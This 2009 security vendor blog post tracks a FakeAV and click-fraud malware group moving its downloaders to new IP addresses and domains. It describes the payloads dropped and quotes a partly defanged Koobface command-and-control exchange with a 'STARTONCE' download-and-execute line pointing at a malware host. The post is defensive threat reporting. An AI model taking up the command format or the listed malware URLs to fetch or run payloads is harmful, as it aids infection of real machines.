ThreatFire Research Blog Home
 
 
« Undetected Autorun/Injector Variant on the Loose
Patch Tuesday »

Softwarefortubeview Moves to a New Home at 65.110.50.141

We posted a couple of weeks ago on the continued success of a group in distributing FakeAv/Rogueware/Scareware.

Please note that their downloaders have been moved to a new home at 65.110.50.141. There are multiple domains currently resolving to that ip managed by “Sago Networks”. One we know of currently serving softwarefortubeview.40019.exe executables is wile-exe.com. The move appears to have happened on June 1st. Avoid executables from that domain for now.

The downloads appear to be committing some sort of click fraud, although they have been known to pop fake alerts to move FakeAv software, see here, here and here.

Update (2009.06.09) — we are following the downloaders, and the group moved to another couple of ip’s yesterday (2009.06.08), this time 66.197.171.9 and 66.197.171.6. For example, you can find the malware at my-exe-profile. com/softwarefortubeview.45084.exe. The server virtually hosts an array of content, include “Download Now!” links that redirect to paid mp3 services, fetish videos, and more malware.
Also related is my-exe-profile. com/ av-scanner.48047.exe. However, this dropper/downloader lays out a couple of Clickfraud trojans, visiting a long list of banner ads and ad sites from the compromised host. A Vundo variant is installed. An unusually packed Koobface variant is dropped on the machine. Another iehelper.dll Bho component pops a screenful of AntiVirus System PRO, or SWP2009Pro, and a dialog “There are serious threats detected on your computer” and another bogus “Windows Security Alert” reporting “Windows reports that your computer is infected”.

The final, and fairly new piece, is that it downloads pdrv.exe from evidek.ro. The “download and exec” command for this executable is sent down from a Koobface related channel, while more bogus alerts are popping on the system:

Partially mangled Koobface post and response are listed here:

POST /ld/gen.php
HTTP/1.0
Host: upr15may.com
f=0&a=1956647682&v=09&c=0&s=ld&l=71140&ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr=-1&c_yb=-1&c_tg=0&c_nl=0&c_fu=-1HTTP/1.1

#PID=8000
STARTONCE|hxxp://evidek. ro/1/pdrv.exe
WAIT|120
#BLACKLABEL
EXIT

This dropper creates
%ProgramFiles%\podmena\podmena.dll
%ProgramFiles%\podmena\podmena.sys
for which there is virtually no AV detection at this time. As always, don’t forget your behavioral-based protection.

The podmena.sys driver is interesting — it attaches to the tcpip device driver and appears to intercept network traffic coming and going from the system.

This entry was posted on Wednesday, June 3rd, 2009 at 10:12 am and is filed under FakeAlert, Rogueware. You can follow any responses to this entry through the RSS 2.0 feed. You can skip to the end and leave a response. Pinging is currently not allowed.

Leave a Reply

Click here to cancel reply.

 
  • Blog Archive

    • November 2009
    • October 2009
    • September 2009
    • August 2009
    • July 2009
    • June 2009
    • May 2009
    • April 2009
    • March 2009
    • February 2009
    • January 2009
    • December 2008
    • November 2008
    • October 2008
    • September 2008
    • August 2008
    • July 2008
    • June 2008
    • May 2008
    • April 2008
    • March 2008
    • February 2008
    • January 2008
    • December 2007
    • November 2007
    • October 2007
    • September 2007
    • August 2007
  • Search This Blog

  • RSS Subscribe Now

    • Koobface on Yuotube
    • Spamvertizing Social Networks and Why Legitimate Money Will Help Clean Them Up
    • Zbot: Not Your Typical Malware
  • Categories

  • About ThreatFire

    ThreatFire™, features innovative real-time behavioral protection technology that provides powerful standalone protection or the perfect complement to traditional signature-based antivirus programs.

    ThreatFire's patent-pending ActiveDefense™ technology offers unsurpassed protection against both known and unknown zero-day viruses, worms, trojans, rootkits, buffer overflows, spyware, adware and other malware.

    Learn more...

  • Blogroll

    • AV-Comparatives weblog
    • Bill Mullins’ Weblog – Tech Thoughts
    • Security Response Blogs
    • Swatkat’s rants
    • ThreatExpert Blog
  • Links

    • AMTSO
    • AV-Test
    • Frank Boldewin’s Reconstructor
    • PC Tools
    • ThreatExpert
    • ThreatFire
    • Virus Bulletin
 
Subscribe to:
Posts (Atom)
Entries (RSS) and Comments (RSS).